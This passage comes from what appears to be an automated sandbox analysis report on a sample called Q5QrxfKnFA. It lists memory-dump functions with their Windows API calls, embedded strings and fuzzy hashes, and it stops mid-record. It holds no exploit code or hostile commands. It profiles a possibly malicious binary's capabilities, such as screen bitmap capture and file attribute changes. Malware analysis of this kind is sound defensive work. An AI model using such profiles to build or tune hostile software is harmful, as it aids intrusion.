                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: 1deda77ee8576233fbc3eb85a35e34c96a501abc4ad67bda402c44d6d41b17ae
                                                        • Instruction ID: 3228463c45aba816e77f5f34b689aaf44d84edbdd488293e26ffc04deeb016e1
                                                        • Opcode Fuzzy Hash: 1deda77ee8576233fbc3eb85a35e34c96a501abc4ad67bda402c44d6d41b17ae
                                                        • Instruction Fuzzy Hash: 1731B031948609ABDF13FA60DE03EFE77A8AB10750F210128F501BD1D6EB517F148A92
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 003B5013
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 003B501E
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 003B5029
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 003B5034
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 003B503F
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 003B504A
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 003B5055
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 003B5060
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 003B506B
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 003B5076
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 003B5081
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 003B508C
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 003B5097
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 003B50A2
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 003B50AD
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 003B50B8
                                                        • GetCursorInfo.USER32(?), ref: 003B50C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: 44092b76e2756ad7faee56fdf335d07ed7bf3eca9c1c678fff9ea388d694ee98
                                                        • Instruction ID: c6c075561976878960f4d8771deca6c7979fa71bdbc1c826c1d2ad7f320f3aa6
                                                        • Opcode Fuzzy Hash: 44092b76e2756ad7faee56fdf335d07ed7bf3eca9c1c678fff9ea388d694ee98
                                                        • Instruction Fuzzy Hash: 3131E5B1E4831D6ADF119FB68C8999FBFE8FF04754F50452AE50DE7280DA78A5008F91
                                                        APIs
                                                        • _memset.LIBCMT ref: 003CA259
                                                        • DestroyWindow.USER32(?,?), ref: 003CA2D3
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003CA34D
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003CA36F
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA382
                                                        • DestroyWindow.USER32(00000000), ref: 003CA3A4
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003CA3DB
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA3F4
                                                        • GetDesktopWindow.USER32 ref: 003CA40D
                                                        • GetWindowRect.USER32(00000000), ref: 003CA414
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003CA42C
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003CA444
                                                          • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: 4e999e06d5de6f711affb55374230faf22710f20e9771201c0c05e0cf4933495
                                                        • Instruction ID: 183132c8d9a2896082bb3c631a674adf18de68d922a99f7545d9d89c4496c256
                                                        • Opcode Fuzzy Hash: 4e999e06d5de6f711affb55374230faf22710f20e9771201c0c05e0cf4933495
                                                        • Instruction Fuzzy Hash: 14717971140608AFDB26DF28CC49F6A7BEAFB88304F05452DF985DB2A0C770A916CB56
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 003C4424
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C446F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: ff135646ea64d742b0de6bb2c30e9d0f4ee2b654aea090bed5d6064214882b65
                                                        • Instruction ID: cfd4dd0522a18af5a5a3148432155313e98cc461b321a095b079440829a9f678
                                                        • Opcode Fuzzy Hash: ff135646ea64d742b0de6bb2c30e9d0f4ee2b654aea090bed5d6064214882b65
                                                        • Instruction Fuzzy Hash: 9C916A346043019BCB1AEF14C462B6EB7E5AF95350F05886DF8969F7A2CB31ED09CB81
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003CB8B4
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C91C2), ref: 003CB910
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB949
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003CB98C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB9C3
                                                        • FreeLibrary.KERNEL32(?), ref: 003CB9CF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CB9DF
                                                        • DestroyIcon.USER32(?,?,?,?,?,003C91C2), ref: 003CB9EE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003CBA0B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003CBA17
                                                          • Part of subcall function 00362EFD: __wcsicmp_l.LIBCMT ref: 00362F86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 1212759294-1154884017
                                                        • Opcode ID: dffa24c4be865476f5c8d847b1198d224fa9b0ccf8fd291a79a1e9b15e19b1d4
                                                        • Instruction ID: c3c0064c6fe6fbc1c652d918c54cf99c157e67cb56553d6fccab72a675704863
                                                        • Opcode Fuzzy Hash: dffa24c4be865476f5c8d847b1198d224fa9b0ccf8fd291a79a1e9b15e19b1d4
                                                        • Instruction Fuzzy Hash: C861D171900619BEEB16DF64CC42FBEBBACEB08710F10851AF915DA1D0DB75AD90DBA0
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 003ADCDC
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003ADCEC
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003ADCF8
                                                        • __wsplitpath.LIBCMT ref: 003ADD56
                                                        • _wcscat.LIBCMT ref: 003ADD6E
                                                        • _wcscat.LIBCMT ref: 003ADD80
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003ADD95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADDA9
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADDDB
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADDFC
                                                        • _wcscpy.LIBCMT ref: 003ADE08
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003ADE47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 4cc0fb581aacdbaa737fc4aacfe1b00d1e45b7322d6801b5365ec20a52b9151f
                                                        • Instruction ID: 3fe3d4ea73ed8142a04f012710914f426d3c004e5303dbee1870d6d86999ffaa
                                                        • Opcode Fuzzy Hash: 4cc0fb581aacdbaa737fc4aacfe1b00d1e45b7322d6801b5365ec20a52b9151f
                                                        • Instruction Fuzzy Hash: 43615B765042059FCB11EF64C844EAFB3E8FF8A310F04491AE99ACB651EB71E945CB91
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003A9C7F
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003A9CA0
                                                        • __swprintf.LIBCMT ref: 003A9CF9
                                                        • __swprintf.LIBCMT ref: 003A9D12
                                                        • _wprintf.LIBCMT ref: 003A9DB9
                                                        • _wprintf.LIBCMT ref: 003A9DD7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 311963372-3080491070
                                                        • Opcode ID: aa24c326e5db4f1c97c8657c990cca9ceeaccf320d4ff0e69df596c2a6c1e667
                                                        • Instruction ID: d06bfc425346c61ffa784ce47626ef51327dba480ff63e1e0d3ef21a20c5d2d0
                                                        • Opcode Fuzzy Hash: aa24c326e5db4f1c97c8657c990cca9ceeaccf320d4ff0e69df596c2a6c1e667
                                                        • Instruction Fuzzy Hash: F3516F32900509AACF16EBE0DD86EEEB7B8EF14300F500066F505BA1A2DB312E59DF60
                                                        APIs
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • CharLowerBuffW.USER32(?,?), ref: 003AA3CB
                                                        • GetDriveTypeW.KERNEL32 ref: 003AA418
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA460
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA497
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA4C5
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: e12dec79803c084425436099f91c8b1ea324f22b5aabebed772ccc30e8ce9c13
                                                        • Instruction ID: 5aa47db62b82950c659fd395d2a142e193fd78b1ec176f3cffce7cb69bf0a28c
                                                        • Opcode Fuzzy Hash: e12dec79803c084425436099f91c8b1ea324f22b5aabebed772ccc30e8ce9c13
                                                        • Instruction Fuzzy Hash: 43517E725047059FC706EF25C88196BB3E8FF89758F00886DF88A9B261DB71ED09CB42
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0037E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0039F8DF
                                                        • LoadStringW.USER32(00000000,?,0037E029,00000001), ref: 0039F8E8
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0037E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0039F90A
                                                        • LoadStringW.USER32(00000000,?,0037E029,00000001), ref: 0039F90D
                                                        • __swprintf.LIBCMT ref: 0039F95D
                                                        • __swprintf.LIBCMT ref: 0039F96E
                                                        • _wprintf.LIBCMT ref: 0039FA17
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039FA2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: 9fd7f431e8feedaca91b7663eead8c19e4169352323a145673c2d4930300b859
                                                        • Instruction ID: df5d78ffaae86d917c1d9f96064fb28c13f1e18e3e7b7d7a57eeedd94d1e7d9c
                                                        • Opcode Fuzzy Hash: 9fd7f431e8feedaca91b7663eead8c19e4169352323a145673c2d4930300b859
                                                        • Instruction Fuzzy Hash: 5F410D72904109AACF16FBE4DD86EEEB7B8AF14300F500465F505BA0A2EB356F49CB61
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003C9207,?,?), ref: 003CBA56
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA6D
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA78
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA85
                                                        • GlobalLock.KERNEL32(00000000), ref: 003CBA8E
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBA9D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003CBAA6
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBAAD
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C9207,?,?,00000000,?), ref: 003CBABE
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,003D2CAC,?), ref: 003CBAD7
                                                        • GlobalFree.KERNEL32(00000000), ref: 003CBAE7
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 003CBB0B
                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003CBB36
                                                        • DeleteObject.GDI32(00000000), ref: 003CBB5E
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003CBB74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                                        • Instruction ID: f17f1f23f5016b651718aa676f461824e69454b8fafde4d7b65d1377944e0f9c
                                                        • Opcode Fuzzy Hash: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                                        • Instruction Fuzzy Hash: DE410579600208AFDB129F65DC89EABBBBDFB89711F114069F945D7260D730AE01DB60
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 003ADA10
                                                        • _wcscat.LIBCMT ref: 003ADA28
                                                        • _wcscat.LIBCMT ref: 003ADA3A
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003ADA4F
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADA63
                                                        • GetFileAttributesW.KERNEL32(?), ref: 003ADA7B
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 003ADA95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: a3dee539afa816c6f8e5ee59dd9a5bab61587d1ad305d082f3481aee25e31950
                                                        • Instruction ID: a147f1384ad4c9e0bda992e79599c35190caae1f2717e6e647e7d0ca4cde7864
                                                        • Opcode Fuzzy Hash: a3dee539afa816c6f8e5ee59dd9a5bab61587d1ad305d082f3481aee25e31950
                                                        • Instruction Fuzzy Hash: CA8181715043419FCB66DF64C844AAFB7E8EF8A710F15882EF88ACB651E730E945CB52
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003CC1FC
                                                        • GetFocus.USER32 ref: 003CC20C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 003CC217
                                                        • _memset.LIBCMT ref: 003CC342
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003CC36D
                                                        • GetMenuItemCount.USER32(?), ref: 003CC38D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 003CC3A0
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003CC3D4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003CC41C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003CC454
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003CC489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 1d4f12055f93429f1ea2c55252e2dbfc297bac2dea8385197bd7db21bdd7c16d
                                                        • Instruction ID: 9f60d047ff7c8a1f2cbd4361442619ca38d2c1c3063172e8a893ed9d31e8d84b
                                                        • Opcode Fuzzy Hash: 1d4f12055f93429f1ea2c55252e2dbfc297bac2dea8385197bd7db21bdd7c16d
                                                        • Instruction Fuzzy Hash: 7E8177712183019FDB16DF15D894E6BBBE9EB88314F00892EF999D7291C730ED05CB52
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 003B738F
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003B739B
                                                        • CreateCompatibleDC.GDI32(?), ref: 003B73A7
                                                        • SelectObject.GDI32(00000000,?), ref: 003B73B4
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003B7408
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003B7444
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003B7468
                                                        • SelectObject.GDI32(00000006,?), ref: 003B7470
                                                        • DeleteObject.GDI32(?), ref: 003B7479
                                                        • DeleteDC.GDI32(00000006), ref: 003B7480
                                                        • ReleaseDC.USER32(00000000,?), ref: 003B748B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 4e0b6331add1915c52a8f8b27083fb2bf784a2e10365c87b15f2186616b78142
